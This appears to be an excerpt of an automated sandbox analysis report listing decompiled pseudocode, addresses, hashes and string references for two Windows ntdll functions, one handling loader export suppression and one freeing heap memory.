                                                                                        0x00c3189d
                                                                                        0x00c3184c
                                                                                        0x00c31859
                                                                                        0x00c31859
                                                                                        0x00c3185c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31851
                                                                                        0x00c31853
                                                                                        0x00c31855
                                                                                        0x00c31865
                                                                                        0x00c31865
                                                                                        0x00c31866
                                                                                        0x00c31868
                                                                                        0x00c31870
                                                                                        0x00000000
                                                                                        0x00c31870
                                                                                        0x00c31857
                                                                                        0x00c31857
                                                                                        0x00c3185e
                                                                                        0x00000000
                                                                                        0x00c316d2
                                                                                        0x00c316d2
                                                                                        0x00c316d5
                                                                                        0x00c316d5
                                                                                        0x00c316d8
                                                                                        0x00c316da
                                                                                        0x00c316dd
                                                                                        0x00c316e0
                                                                                        0x00c316e3
                                                                                        0x00c316e5
                                                                                        0x00c31808
                                                                                        0x00c31808
                                                                                        0x00c31809
                                                                                        0x00c31812
                                                                                        0x00c31817
                                                                                        0x00c31817
                                                                                        0x00000000
                                                                                        0x00c31817
                                                                                        0x00c316eb
                                                                                        0x00c316ed
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c316f6
                                                                                        0x00c316f9
                                                                                        0x00c316ff
                                                                                        0x00c31701
                                                                                        0x00c3172c
                                                                                        0x00c3172c
                                                                                        0x00c3172f
                                                                                        0x00c31732
                                                                                        0x00c31734
                                                                                        0x00c31737
                                                                                        0x00c3173b
                                                                                        0x00c3175e
                                                                                        0x00c3175e
                                                                                        0x00c31761
                                                                                        0x00c31764
                                                                                        0x00c3176d
                                                                                        0x00c31774
                                                                                        0x00c31777
                                                                                        0x00c3177a
                                                                                        0x00c3177c
                                                                                        0x00c3177f
                                                                                        0x00c31781
                                                                                        0x00c31781
                                                                                        0x00c31784
                                                                                        0x00c31784
                                                                                        0x00c3177f
                                                                                        0x00c3178c
                                                                                        0x00c31791
                                                                                        0x00c31796
                                                                                        0x00c31799
                                                                                        0x00c3179c
                                                                                        0x00c3179e
                                                                                        0x00c317a5
                                                                                        0x00c317a9
                                                                                        0x00c317c9
                                                                                        0x00c317ce
                                                                                        0x00c317ab
                                                                                        0x00c317c1
                                                                                        0x00c317c6
                                                                                        0x00c317dc
                                                                                        0x00c317e3
                                                                                        0x00c317e8
                                                                                        0x00c317ee
                                                                                        0x00c317f1
                                                                                        0x00c317f5
                                                                                        0x00c317f7
                                                                                        0x00c317fe
                                                                                        0x00c317ff
                                                                                        0x00c317ff
                                                                                        0x00c317f5
                                                                                        0x00c3179c
                                                                                        0x00000000
                                                                                        0x00c31764
                                                                                        0x00c31741
                                                                                        0x00c31746
                                                                                        0x00c31748
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31754
                                                                                        0x00000000
                                                                                        0x00c31754
                                                                                        0x00c31703
                                                                                        0x00c31710
                                                                                        0x00c31710
                                                                                        0x00c31713
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31708
                                                                                        0x00c3170a
                                                                                        0x00c3170c
                                                                                        0x00c3171c
                                                                                        0x00c3171c
                                                                                        0x00c3171d
                                                                                        0x00c3171f
                                                                                        0x00c31727
                                                                                        0x00000000
                                                                                        0x00c31727
                                                                                        0x00c3170e
                                                                                        0x00c3170e
                                                                                        0x00c31715
                                                                                        0x00000000
                                                                                        0x00c31715
                                                                                        0x00c316cc
                                                                                        0x00be9a45
                                                                                        0x00be9a45
                                                                                        0x00be9a0e
                                                                                        0x00be9a1c
                                                                                        0x00be9a23
                                                                                        0x00c3167e
                                                                                        0x00c3167f
                                                                                        0x00c31681
                                                                                        0x00c31683
                                                                                        0x00c31684
                                                                                        0x00000000
                                                                                        0x00c31684
                                                                                        0x00000000
                                                                                        0x00be9aad
                                                                                        0x00be9aad
                                                                                        0x00be9ab0
                                                                                        0x00be9ab3
                                                                                        0x00be9ab3
                                                                                        0x00be9ab6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00be9ab8
                                                                                        0x00be9aba
                                                                                        0x00be9abc
                                                                                        0x00be9ac8
                                                                                        0x00be9ac8
                                                                                        0x00000000
                                                                                        0x00be9abe
                                                                                        0x00be9abe
                                                                                        0x00be9ac0
                                                                                        0x00000000
                                                                                        0x00be9ac0
                                                                                        0x00be9abc
                                                                                        0x00be9ad2
                                                                                        0x00000000
                                                                                        0x00be9ad2
                                                                                        0x00be9aab

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: 7f8849e4e7b0bf7d73041769c88baf62fc0f037870b78b2820dc0eb8155a9330
                                                                                        • Instruction ID: c2fe0e9fa012859dc701dd2738a190cdcef3d98fd483183b64e151934b8e750c
                                                                                        • Opcode Fuzzy Hash: 7f8849e4e7b0bf7d73041769c88baf62fc0f037870b78b2820dc0eb8155a9330
                                                                                        • Instruction Fuzzy Hash: 2D222270A102419FDB24CF29C896B7AB7F5EF45704F2885ADE8568B382E730ED85CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 83%
                                                                                        			E00BD8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00BD934A() != 0) {
								_t159 = E00C4A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xcb5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00C45510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xcb5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00BD849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00BD8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00BD8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xcb5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xcb5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00BE2280(_t92, 0xcb86cc);
															_t94 = E00C99DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00BF61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xcb5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00BD8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xcb5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xcb5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00C0F380(_t136, 0xba1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00BE2280(_t108, 0xcb86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00BF61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00C99D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00BDFFB0(_t118, _t156, 0xcb86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00C09A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                        0x00bd8799
                                                                                        0x00bd879d
                                                                                        0x00bd87a1
                                                                                        0x00bd87a3
                                                                                        0x00bd87a8
                                                                                        0x00bd87c3
                                                                                        0x00bd87c3
                                                                                        0x00bd87c8
                                                                                        0x00bd87d1
                                                                                        0x00bd87d4
                                                                                        0x00bd87d8
                                                                                        0x00bd87e5
                                                                                        0x00bd87ec
                                                                                        0x00c29bfe
                                                                                        0x00c29c00
                                                                                        0x00c29c02
                                                                                        0x00c29c08
                                                                                        0x00c29c0d
                                                                                        0x00c29c0f
                                                                                        0x00c29c14
                                                                                        0x00c29c2d
                                                                                        0x00c29c32
                                                                                        0x00c29c37
                                                                                        0x00c29c3a
                                                                                        0x00c29c3c
                                                                                        0x00c29c42
                                                                                        0x00c29c42
                                                                                        0x00c29c3c
                                                                                        0x00c29c02
                                                                                        0x00bd87da
                                                                                        0x00bd87df
                                                                                        0x00bd87e3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd87e3
                                                                                        0x00bd87f2
                                                                                        0x00000000
                                                                                        0x00bd87fb
                                                                                        0x00bd87fd
                                                                                        0x00bd87fe
                                                                                        0x00bd880e
                                                                                        0x00bd880f
                                                                                        0x00bd8810
                                                                                        0x00bd8814
                                                                                        0x00bd881a
                                                                                        0x00bd881c
                                                                                        0x00bd881f
                                                                                        0x00bd8821
                                                                                        0x00bd8822
                                                                                        0x00bd8824
                                                                                        0x00bd8826
                                                                                        0x00bd882c
                                                                                        0x00bd882e
                                                                                        0x00c29c48
                                                                                        0x00c29c48
                                                                                        0x00bd8834
                                                                                        0x00bd8834
                                                                                        0x00bd8837
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd8837
                                                                                        0x00bd882e
                                                                                        0x00bd883d
                                                                                        0x00bd8840
                                                                                        0x00bd8843
                                                                                        0x00bd8846
                                                                                        0x00bd8849
                                                                                        0x00bd884c
                                                                                        0x00bd884e
                                                                                        0x00bd8850
                                                                                        0x00bd8852
                                                                                        0x00bd8854
                                                                                        0x00bd8857
                                                                                        0x00bd88b4
                                                                                        0x00bd88b6
                                                                                        0x00bd88b6
                                                                                        0x00bd8859
                                                                                        0x00bd8859
                                                                                        0x00bd8859
                                                                                        0x00bd8861
                                                                                        0x00bd8866
                                                                                        0x00bd886a
                                                                                        0x00bd893d
                                                                                        0x00bd8941
                                                                                        0x00000000
                                                                                        0x00bd8947
                                                                                        0x00bd8947
                                                                                        0x00bd894a
                                                                                        0x00bd894c
                                                                                        0x00000000
                                                                                        0x00bd8952
                                                                                        0x00bd8955
                                                                                        0x00bd895a
                                                                                        0x00bd895d
                                                                                        0x00bd895d
                                                                                        0x00bd895f
                                                                                        0x00bd8961
                                                                                        0x00bd8961
                                                                                        0x00bd8968
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd896a
                                                                                        0x00bd896b
                                                                                        0x00bd896e
                                                                                        0x00000000
                                                                                        0x00bd8970
                                                                                        0x00bd8970
                                                                                        0x00bd8970
                                                                                        0x00bd8970
                                                                                        0x00bd8972
                                                                                        0x00bd8972
                                                                                        0x00bd8974
                                                                                        0x00000000
                                                                                        0x00bd897a
                                                                                        0x00bd897a
                                                                                        0x00bd897d
                                                                                        0x00000000
                                                                                        0x00bd8983
                                                                                        0x00c29c65
                                                                                        0x00c29c6d
                                                                                        0x00c29c72
                                                                                        0x00c29c75
                                                                                        0x00c29c75
                                                                                        0x00c29c82
                                                                                        0x00c29c86
                                                                                        0x00c29c87
                                                                                        0x00c29c88
                                                                                        0x00c29c89
                                                                                        0x00c29c8c
                                                                                        0x00c29c90
                                                                                        0x00c29c95
                                                                                        0x00c29c97
                                                                                        0x00c29ca0
                                                                                        0x00c29ca3
                                                                                        0x00c29ca9
                                                                                        0x00c29ca9
                                                                                        0x00000000
                                                                                        0x00c29ca9
                                                                                        0x00c29ca3
                                                                                        0x00000000
                                                                                        0x00c29c97
                                                                                        0x00bd897d
                                                                                        0x00000000
                                                                                        0x00bd8974
                                                                                        0x00bd8988
                                                                                        0x00bd8992
                                                                                        0x00bd8996
                                                                                        0x00000000
                                                                                        0x00bd8996
                                                                                        0x00bd894c
                                                                                        0x00000000
                                                                                        0x00bd8870
                                                                                        0x00bd887b
                                                                                        0x00bd887d
                                                                                        0x00bd887f
                                                                                        0x00bd8881
                                                                                        0x00bd8884
                                                                                        0x00bd8884
                                                                                        0x00bd8886
                                                                                        0x00bd8889
                                                                                        0x00bd888c
                                                                                        0x00bd888e
                                                                                        0x00bd8891
                                                                                        0x00bd8891
                                                                                        0x00bd8898
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd889a
                                                                                        0x00bd889b
                                                                                        0x00bd889e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd88a0
                                                                                        0x00bd88a8
                                                                                        0x00bd88b0
                                                                                        0x00bd88b2
                                                                                        0x00bd88d3
                                                                                        0x00bd88d5
                                                                                        0x00000000
                                                                                        0x00bd88d7
                                                                                        0x00bd88db
                                                                                        0x00bd88dc
                                                                                        0x00bd88e0
                                                                                        0x00bd88e8
                                                                                        0x00bd88ee
                                                                                        0x00bd88f0
                                                                                        0x00bd88f3
                                                                                        0x00bd88fc
                                                                                        0x00bd8901
                                                                                        0x00bd8906
                                                                                        0x00bd890c
                                                                                        0x00bd890c
                                                                                        0x00bd890f
                                                                                        0x00bd8916
                                                                                        0x00bd8917
                                                                                        0x00bd8918
                                                                                        0x00bd8919
                                                                                        0x00bd891a
                                                                                        0x00bd891f
                                                                                        0x00bd8921
                                                                                        0x00c29c52
                                                                                        0x00c29c55
                                                                                        0x00c29c5b
                                                                                        0x00c29cac
                                                                                        0x00c29cc0
                                                                                        0x00c29cc0
                                                                                        0x00c29c55
                                                                                        0x00bd8927
                                                                                        0x00bd8927
                                                                                        0x00bd892f
                                                                                        0x00bd8933
                                                                                        0x00000000
                                                                                        0x00bd88f5
                                                                                        0x00bd88f5
                                                                                        0x00000000
                                                                                        0x00bd88f7
                                                                                        0x00bd88f7
                                                                                        0x00bd88fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd88fa
                                                                                        0x00bd88f5
                                                                                        0x00bd88f3
                                                                                        0x00000000
                                                                                        0x00bd88d5
                                                                                        0x00000000
                                                                                        0x00bd88b2
                                                                                        0x00bd88c9
                                                                                        0x00000000
                                                                                        0x00bd88c9
                                                                                        0x00bd887f
                                                                                        0x00bd886a
                                                                                        0x00bd8857
                                                                                        0x00bd8852
                                                                                        0x00bd88bf
                                                                                        0x00bd88bf
                                                                                        0x00bd87aa
                                                                                        0x00bd87ad
                                                                                        0x00bd87ae
                                                                                        0x00bd87b4
                                                                                        0x00bd87b5
                                                                                        0x00bd87b6
                                                                                        0x00bd87b8
                                                                                        0x00bd87bd
                                                                                        0x00bd87c1
                                                                                        0x00bd87f4
                                                                                        0x00bd87fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd87c1
                                                                                        0x00000000

                                                                                        Strings
                                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00C29C18
                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 00C29C28
                                                                                        • LdrpDoPostSnapWork, xrefs: 00C29C1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 2994545307-1948996284
                                                                                        • Opcode ID: cf1d599d86b15a6c798b56f34117dda37a9f0108906e6d11b9c70028358efaa2
                                                                                        • Instruction ID: 53b2cb1d39aa8d4ad3345f27ee6748272f5df5a8b5fb324f7a651d85832c4322
                                                                                        • Opcode Fuzzy Hash: cf1d599d86b15a6c798b56f34117dda37a9f0108906e6d11b9c70028358efaa2
                                                                                        • Instruction Fuzzy Hash: 6491DF71A002169BDF18DF59C881ABAF3F9FF44312F5441AAE945AB351EB31EE01DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 80%
                                                                                        			E00BFAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E00C1D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0xcb8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00C096E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E00C73C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00C096E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00BCB150();
							} else {
								E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00BCB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E00C814FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E00BE7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E00C81411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E00BE7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E00C81411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                        0x00bfac85
                                                                                        0x00bfac88
                                                                                        0x00bfac8a
                                                                                        0x00bfac8d
                                                                                        0x00bfac91
                                                                                        0x00bfac99
                                                                                        0x00bfac9c
                                                                                        0x00c39f57
                                                                                        0x00c39f5b
                                                                                        0x00c39f60
                                                                                        0x00c39f60
                                                                                        0x00bfaca8
                                                                                        0x00bfacae
                                                                                        0x00bfacda
                                                                                        0x00bfacde
                                                                                        0x00bface8
                                                                                        0x00bfaceb
                                                                                        0x00bfacee
                                                                                        0x00000000
                                                                                        0x00bfacee
                                                                                        0x00bfacf6
                                                                                        0x00bfacb0
                                                                                        0x00bfacb0
                                                                                        0x00bfacbb
                                                                                        0x00bfacbd
                                                                                        0x00bfacc0
                                                                                        0x00bfacc5
                                                                                        0x00bfadae
                                                                                        0x00bfadb4
                                                                                        0x00bfadb4
                                                                                        0x00bfacd4
                                                                                        0x00bfacd8
                                                                                        0x00bfacf9
                                                                                        0x00bfacff
                                                                                        0x00bfad04
                                                                                        0x00bfad08
                                                                                        0x00bfad09
                                                                                        0x00bfad10
                                                                                        0x00bfad12
                                                                                        0x00bfad18
                                                                                        0x00c39f6f
                                                                                        0x00c39f74
                                                                                        0x00c39f76
                                                                                        0x00c39f7c
                                                                                        0x00c39f84
                                                                                        0x00c39f88
                                                                                        0x00c39f89
                                                                                        0x00c39f90
                                                                                        0x00c39f90
                                                                                        0x00c39f76
                                                                                        0x00bfad1e
                                                                                        0x00bfad24
                                                                                        0x00bfad26
                                                                                        0x00c3a097
                                                                                        0x00c3a09b
                                                                                        0x00c3a0ba
                                                                                        0x00c3a0bf
                                                                                        0x00c3a09d
                                                                                        0x00c3a0b2
                                                                                        0x00c3a0b7
                                                                                        0x00c3a0c5
                                                                                        0x00c3a0c8
                                                                                        0x00c3a0cb
                                                                                        0x00c3a0d2
                                                                                        0x00000000
                                                                                        0x00bfad2c
                                                                                        0x00bfad2c
                                                                                        0x00bfad2f
                                                                                        0x00bfad34
                                                                                        0x00bfad36
                                                                                        0x00c39f97
                                                                                        0x00c39f9a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c39fa9
                                                                                        0x00bfad3e
                                                                                        0x00bfad3e
                                                                                        0x00bfad41
                                                                                        0x00c39fb3
                                                                                        0x00c39fb9
                                                                                        0x00c39fc0
                                                                                        0x00c39fd0
                                                                                        0x00c39fd0
                                                                                        0x00c39fc0
                                                                                        0x00bfad4a
                                                                                        0x00bfad50
                                                                                        0x00bfad5c
                                                                                        0x00bfad62
                                                                                        0x00bfad68
                                                                                        0x00bfad6b
                                                                                        0x00bfad6d
                                                                                        0x00c39fda
                                                                                        0x00c39fdd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c39fec
                                                                                        0x00000000
                                                                                        0x00bfad73
                                                                                        0x00bfad73
                                                                                        0x00bfad73
                                                                                        0x00bfad75
